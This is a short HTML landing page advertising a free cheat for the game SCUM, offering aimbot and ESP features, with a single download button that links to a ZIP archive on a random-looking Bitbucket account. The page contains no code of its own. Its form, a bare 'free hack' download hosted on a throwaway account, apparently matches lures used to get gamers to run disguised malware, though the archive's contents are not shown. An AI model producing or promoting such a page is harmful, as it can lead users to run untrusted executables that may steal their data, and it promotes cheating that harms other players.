<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Scum Hack</title>
    <style>
        body {
            margin: 0;
            height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            background: linear-gradient(135deg, #ffffff 25%, #e6e6e6 25%, #e6e6e6 50%, #ffffff 50%, #ffffff 75%, #e6e6e6 75%, #e6e6e6 100%);
            background-size: 400% 400%;
            animation: gradient 15s ease infinite;
            font-family: Arial, sans-serif;
        }

        @keyframes gradient {
            0% { background-position: 0% 50%; }
            50% { background-position: 100% 50%; }
            100% { background-position: 0% 50%; }
        }

        h1 {
            margin-bottom: 20px;
            font-size: 2em;
            color: #333;
        }

        .download-button {
            padding: 20px 40px;
            font-size: 1.5em;
            color: white;
            background-color: #007bff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .download-button:hover {
            background-color: #0056b3;
        }

        .features {
            margin-top: 30px;
            font-size: 1.2em;
            color: #555;
            text-align: center;
        }

        .features ul {
            list-style-type: none;
            padding: 0;
        }

        .features li {
            margin: 10px 0;
        }
    </style>
</head>
<body>
    <h1>Scum Free Hack</h1>
    <a href="https://bitbucket.org/amitafgg4/amitar32dd/downloads/ScumHack.zip" download>
        <button class="download-button">Download Now!</button>
    </a>

    <div class="features">
        <h2>Features:</h2>
        <ul>
            <li>Aimbot</li>
            <li>Players ESP</li>
            <li>NPC ESP</li>
            <li>Sentry ESP</li>
            <li>Animals ESP</li>
            <li>Items ESP</li>
            <li>Vehicles ESP</li>
            <li>MISC</li>
            <li>CONFIG </li>
        </ul>
    </div>
</body>
</html>
